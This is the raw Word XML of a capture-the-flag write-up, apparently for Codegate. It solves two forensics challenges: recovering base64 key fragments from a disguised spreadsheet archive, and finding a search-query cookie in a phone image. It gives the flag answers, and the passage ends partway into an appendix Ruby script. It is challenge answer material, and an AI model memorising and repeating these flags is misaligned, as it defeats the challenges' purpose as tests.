      <w:bookmarkStart w:id="17" w:name="_Toc257340768"/>
      <w:r w:rsidRPr="00280EE9">
        <w:rPr>
          <w:rStyle w:val="challenge0"/>
        </w:rPr>
        <w:t>Challnge18</w:t>
      </w:r>
      <w:bookmarkEnd w:id="17"/>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00762DA2">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve">Points:1000  </w:t>
      </w:r>
      <w:r>
        <w:t>Cleared</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>Answer:o0xm1f0rmat4nlys1s</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w:rsidR="009953C5" w:rsidRDefault="00AA5FD6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA5FD6">
        <w:rPr>
          <w:sz w:val="27"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidRPr="00AA5FD6">
        <w:rPr>
          <w:sz w:val="27"/>
        </w:rPr>
        <w:pict>
          <v:shape id="_x0000_s2056" type="#_x0000_t202" style="width:437.4pt;height:84.8pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line">
            <v:textbox style="mso-next-textbox:#_x0000_s2056" inset="5.85pt,.7pt,5.85pt,.7pt">
              <w:txbxContent>
                <w:p w:rsidR="008A4C86" w:rsidRDefault="008A4C86" w:rsidP="00A01E94">
                  <w:r>
                    <w:t>This data has been acquired from the suspect's disk. Find the hidden key!</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="008A4C86" w:rsidRDefault="008A4C86" w:rsidP="00A01E94"/>
                <w:p w:rsidR="008A4C86" w:rsidRDefault="008A4C86" w:rsidP="00A01E94">
                  <w:r>
                    <w:t>http://ctf.codegate.org/thisiswhereiuploadmyfiles/9334A7B726178F014FFB54BC98C93BE6</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="008A4C86" w:rsidRDefault="008A4C86" w:rsidP="00A01E94"/>
                <w:p w:rsidR="008A4C86" w:rsidRPr="002A0D27" w:rsidRDefault="008A4C86" w:rsidP="00A01E94">
                  <w:r>
                    <w:t>hint : spreadsheet</w:t>
                  </w:r>
                </w:p>
              </w:txbxContent>
            </v:textbox>
            <w10:wrap type="none"/>
            <w10:anchorlock/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="006A2FB1" w:rsidRDefault="006A2FB1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A01E94" w:rsidRPr="00A01E94" w:rsidRDefault="00A01E94" w:rsidP="00A01E94">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A01E94">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>"BZh"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006A2FB1">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>header</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve"> data at </w:t>
      </w:r>
      <w:r w:rsidRPr="00A01E94">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>0x4c200</w:t>
      </w:r>
      <w:r w:rsidRPr="00A01E94">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>～</w:t>
      </w:r>
      <w:r w:rsidRPr="00A01E94">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>0x589c4</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A01E94" w:rsidRDefault="00A01E94" w:rsidP="00A01E94">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A01E94" w:rsidRDefault="000131C6" w:rsidP="00A01E94">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:noProof/>
          <w:lang w:val="en-US" w:eastAsia="ko-KR"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5615940" cy="3390265"/>
            <wp:effectExtent l="19050" t="0" r="3810" b="0"/>
            <wp:docPr id="71" name="図 71" descr="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18"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId9" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5615940" cy="3390265"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A01E94" w:rsidRDefault="00A01E94" w:rsidP="00A01E94">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A01E94" w:rsidRDefault="006A2FB1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>export it and header 4byte data changed.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006A2FB1" w:rsidRDefault="00AA5FD6" w:rsidP="006A2FB1">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA5FD6">
        <w:rPr>
          <w:sz w:val="27"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidRPr="00AA5FD6">
        <w:rPr>
          <w:sz w:val="27"/>
        </w:rPr>
        <w:pict>
          <v:shape id="_x0000_s2055" type="#_x0000_t202" style="width:402.2pt;height:14.25pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line">
            <v:textbox style="mso-next-textbox:#_x0000_s2055" inset="5.85pt,.7pt,5.85pt,.7pt">
              <w:txbxContent>
                <w:p w:rsidR="008A4C86" w:rsidRPr="00C03E31" w:rsidRDefault="008A4C86" w:rsidP="006A2FB1">
                  <w:pPr>
                    <w:rPr>
                      <w:rFonts w:eastAsia="MS Mincho"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00C03E31">
                    <w:rPr>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                    <w:t>42 5A 68 02</w:t>
                  </w:r>
                  <w:r w:rsidRPr="00C03E31">
                    <w:rPr>
                      <w:rFonts w:eastAsia="MS Mincho" w:hint="eastAsia"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:val="en-US" w:eastAsia="ja-JP"/>
                    </w:rPr>
                    <w:t xml:space="preserve">   </w:t>
                  </w:r>
                  <w:r w:rsidRPr="00C03E31">
                    <w:rPr>
                      <w:rFonts w:eastAsia="MS Mincho"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:val="en-US" w:eastAsia="ja-JP"/>
                    </w:rPr>
                    <w:sym w:font="Wingdings" w:char="F0E8"/>
                  </w:r>
                  <w:r w:rsidRPr="00C03E31">
                    <w:rPr>
                      <w:rFonts w:eastAsia="MS Mincho" w:hint="eastAsia"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:val="en-US" w:eastAsia="ja-JP"/>
                    </w:rPr>
                    <w:t xml:space="preserve">  </w:t>
                  </w:r>
                  <w:r w:rsidRPr="00C03E31">
                    <w:rPr>
                      <w:rFonts w:eastAsia="MS Mincho"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:val="en-US" w:eastAsia="ja-JP"/>
                    </w:rPr>
                    <w:t>50 4B 03 04</w:t>
                  </w:r>
                </w:p>
              </w:txbxContent>
            </v:textbox>
            <w10:wrap type="none"/>
            <w10:anchorlock/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A01E94" w:rsidRDefault="0086609F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>export data is zip format, same as xlsx format.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C03E31" w:rsidRDefault="00C03E31">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="006A2FB1" w:rsidRDefault="0086609F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve">we can see near the end of </w:t>
      </w:r>
      <w:r w:rsidRPr="0086609F">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>xl/charts/chart[123].xml</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve"> , that's data.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006A2FB1" w:rsidRDefault="00AA5FD6" w:rsidP="0086609F">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA5FD6">
        <w:rPr>
          <w:sz w:val="27"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidRPr="00AA5FD6">
        <w:rPr>
          <w:sz w:val="27"/>
        </w:rPr>
        <w:pict>
          <v:shape id="_x0000_s2054" type="#_x0000_t202" style="width:402.2pt;height:43.4pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line">
            <v:textbox style="mso-next-textbox:#_x0000_s2054" inset="5.85pt,.7pt,5.85pt,.7pt">
              <w:txbxContent>
                <w:p w:rsidR="008A4C86" w:rsidRPr="00C03E31" w:rsidRDefault="008A4C86" w:rsidP="006A2FB1">
                  <w:pPr>
                    <w:rPr>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00C03E31">
                    <w:rPr>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                    <w:t>chart3 ... &lt;c:oddHeader&gt;Page &amp;amp;P bzB4bTFm&lt;/c:oddHeader&gt;</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="008A4C86" w:rsidRPr="00C03E31" w:rsidRDefault="008A4C86" w:rsidP="006A2FB1">
                  <w:pPr>
                    <w:rPr>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00C03E31">
                    <w:rPr>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                    <w:t>chart2 ... &lt;c:oddFooter&gt;Page &amp;amp;P MHJtYXQ0&lt;/c:oddFooter&gt;</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="008A4C86" w:rsidRPr="00C03E31" w:rsidRDefault="008A4C86" w:rsidP="006A2FB1">
                  <w:pPr>
                    <w:rPr>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00C03E31">
                    <w:rPr>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                    <w:t>chart1 ... &lt;c:oddFooter&gt;Page &amp;amp;P bmx5czFz&lt;/c:oddFooter&gt;</w:t>
                  </w:r>
                </w:p>
              </w:txbxContent>
            </v:textbox>
            <w10:wrap type="none"/>
            <w10:anchorlock/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="0086609F" w:rsidRDefault="0086609F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>connect these text and decode base64 , we got key.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E71451" w:rsidRDefault="00E71451">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E71451" w:rsidRDefault="00E71451">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008A4C86" w:rsidRDefault="00AA5FD6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="27"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:pict>
          <v:rect id="_x0000_i1091" style="width:6in;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="gray" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="0086609F" w:rsidRDefault="008A4C86">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="_Toc257340769"/>
      <w:r w:rsidRPr="00280EE9">
        <w:rPr>
          <w:rStyle w:val="challenge0"/>
        </w:rPr>
        <w:t>Challnge19</w:t>
      </w:r>
      <w:bookmarkEnd w:id="18"/>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00762DA2">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve">Points:600   </w:t>
      </w:r>
      <w:r>
        <w:t>Cleared</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>Answer:where can i buy potassium cyanide</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00AA5FD6" w:rsidRPr="00AA5FD6">
        <w:rPr>
          <w:sz w:val="27"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidR="00AA5FD6" w:rsidRPr="00AA5FD6">
        <w:rPr>
          <w:sz w:val="27"/>
        </w:rPr>
        <w:pict>
          <v:shape id="_x0000_s2052" type="#_x0000_t202" style="width:437.4pt;height:120.55pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line">
            <v:textbox style="mso-next-textbox:#_x0000_s2052" inset="5.85pt,.7pt,5.85pt,.7pt">
              <w:txbxContent>
                <w:p w:rsidR="008A4C86" w:rsidRDefault="008A4C86" w:rsidP="0086609F">
                  <w:r>
                    <w:t>Found a dead guy on the street, assumed that a guy committed suicide.</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="008A4C86" w:rsidRDefault="008A4C86" w:rsidP="0086609F">
                  <w:r>
                    <w:t>How can you assume that? Find the clue.</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="008A4C86" w:rsidRDefault="008A4C86" w:rsidP="0086609F"/>
                <w:p w:rsidR="008A4C86" w:rsidRDefault="008A4C86" w:rsidP="0086609F">
                  <w:r>
                    <w:t>http://ctf9.codegate.org:21321/thisiswhereiuploadmyfiles/56DACF1C6CF363F27501FFCA50CC0415</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="008A4C86" w:rsidRDefault="008A4C86" w:rsidP="0086609F">
                  <w:r>
                    <w:t>http://ctf.codegate.org/thisiswhereiuploadmyfiles/56DACF1C6CF363F27501FFCA50CC0415</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="008A4C86" w:rsidRDefault="008A4C86" w:rsidP="0086609F"/>
                <w:p w:rsidR="008A4C86" w:rsidRPr="002A0D27" w:rsidRDefault="008A4C86" w:rsidP="0086609F">
                  <w:r>
                    <w:t>hint : acquired from his phone.</w:t>
                  </w:r>
                </w:p>
              </w:txbxContent>
            </v:textbox>
            <w10:wrap type="none"/>
            <w10:anchorlock/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="0086609F">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>seems file is Windows CE? file image.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0086609F" w:rsidRDefault="0086609F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0086609F" w:rsidRDefault="004C534A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>we found cookie data.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0086609F" w:rsidRDefault="0086609F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0086609F" w:rsidRDefault="0086609F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086609F">
        <w:t>\__TFAT_HIDDEN_ROOT_DIR__\Application Data\Opera\cookies4.dat 0x2488</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0086609F" w:rsidRDefault="0086609F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0086609F" w:rsidRDefault="00AA5FD6" w:rsidP="0086609F">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA5FD6">
        <w:rPr>
          <w:sz w:val="27"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidRPr="00AA5FD6">
        <w:rPr>
          <w:sz w:val="27"/>
        </w:rPr>
        <w:pict>
          <v:shape id="_x0000_s2051" type="#_x0000_t202" style="width:402.2pt;height:16.25pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line">
            <v:textbox style="mso-next-textbox:#_x0000_s2051" inset="5.85pt,.7pt,5.85pt,.7pt">
              <w:txbxContent>
                <w:p w:rsidR="008A4C86" w:rsidRPr="00C03E31" w:rsidRDefault="008A4C86" w:rsidP="0086609F">
                  <w:pPr>
                    <w:rPr>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00C03E31">
                    <w:rPr>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                    <w:t>where%20can%20i%20buy%20potassium%20cyanide</w:t>
                  </w:r>
                </w:p>
              </w:txbxContent>
            </v:textbox>
            <w10:wrap type="none"/>
            <w10:anchorlock/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="004C534A" w:rsidRDefault="004C534A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E71451" w:rsidRDefault="004C534A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>That is key.</w:t>
      </w:r>
      <w:r w:rsidR="008A4C86">
        <w:br/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E71451" w:rsidRDefault="00E71451">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008A4C86" w:rsidRDefault="00AA5FD6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="27"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:pict>
          <v:rect id="_x0000_i1092" style="width:6in;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="gray" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="00280EE9" w:rsidRDefault="00EB4B4B" w:rsidP="00D56926">
      <w:pPr>
        <w:pStyle w:val="challenge"/>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
      <w:bookmarkStart w:id="19" w:name="_Toc257340770"/>
      <w:r w:rsidR="00D56926">
        <w:rPr>
          <w:rStyle w:val="shorttext"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Appendix</w:t>
      </w:r>
      <w:bookmarkEnd w:id="19"/>
    </w:p>
    <w:p w:rsidR="001A317E" w:rsidRDefault="001A317E" w:rsidP="00921462">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>----prob3.rb----</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001A317E" w:rsidRPr="001A317E" w:rsidRDefault="001A317E" w:rsidP="001A317E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A317E">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>#!/usr/bin/ruby</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001A317E" w:rsidRPr="001A317E" w:rsidRDefault="001A317E" w:rsidP="001A317E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A317E">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>require 'socket'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001A317E" w:rsidRPr="001A317E" w:rsidRDefault="001A317E" w:rsidP="001A317E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A317E">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>require 'pp'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001A317E" w:rsidRPr="001A317E" w:rsidRDefault="001A317E" w:rsidP="001A317E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="001A317E" w:rsidRPr="001A317E" w:rsidRDefault="001A317E" w:rsidP="001A317E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A317E">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>def dump(buf)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001A317E" w:rsidRPr="001A317E" w:rsidRDefault="001A317E" w:rsidP="001A317E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A317E">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve">  puts "========"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001A317E" w:rsidRPr="001A317E" w:rsidRDefault="001A317E" w:rsidP="001A317E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A317E">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
